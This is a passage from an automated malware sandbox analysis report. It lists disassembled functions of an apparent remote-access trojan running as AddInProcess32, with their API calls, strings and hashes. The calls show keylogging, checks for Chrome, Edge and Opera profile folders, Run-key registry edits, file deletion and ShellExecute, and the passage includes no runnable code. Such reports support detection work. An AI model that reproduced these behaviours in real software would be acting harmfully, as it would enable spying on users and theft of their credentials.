                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                • API String ID: 1174141254-4188645398
                                                                                                • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                • API String ID: 1174141254-2800177040
                                                                                                • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                • API String ID: 1174141254-1629609700
                                                                                                • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,00475100), ref: 0040A451
                                                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,00475100), ref: 0040A479
                                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475154,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                • String ID: [AltL]$[AltR]
                                                                                                • API String ID: 2738857842-2658077756
                                                                                                • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: !D@$open
                                                                                                • API String ID: 587946157-1586967515
                                                                                                • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                • API String ID: 1649606143-2446555240
                                                                                                • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                • String ID: <kG$@kG
                                                                                                • API String ID: 1881088180-1261746286
                                                                                                • Opcode ID: 225a41fd0d315e7b14745aeefdffd8a249a85d76d0a8159229783941359da412
                                                                                                • Instruction ID: b3c290aa7aaf28965b2d5d57398085964b0ab7c4475a0d5935719b6e6c356165
                                                                                                • Opcode Fuzzy Hash: 225a41fd0d315e7b14745aeefdffd8a249a85d76d0a8159229783941359da412
                                                                                                • Instruction Fuzzy Hash: 4BE0D8315049208AC510B75EE442AC53345DB0A324B21907BF414D72D2CBAE78C24E5D
                                                                                                Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752E8,00475300,?,pth_unenc), ref: 00413A6C
                                                                                                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteOpenValue
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                • API String ID: 2654517830-1051519024
                                                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteDirectoryFileRemove
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3325800564-4028850238
                                                                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1872346434-4028850238
                                                                                                • Opcode ID: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
                                                                                                • Instruction ID: 4cc810616d40180dbd1e9271652f71629269b6e9fac0605c61d014a2f2010889
                                                                                                • Opcode Fuzzy Hash: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
                                                                                                • Instruction Fuzzy Hash: B0D0C934189712EBD7220B70AE49B443A6CA705322F141360F429413F1C6A98894AA18
                                                                                                Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
                                                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 4100373531-0
                                                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99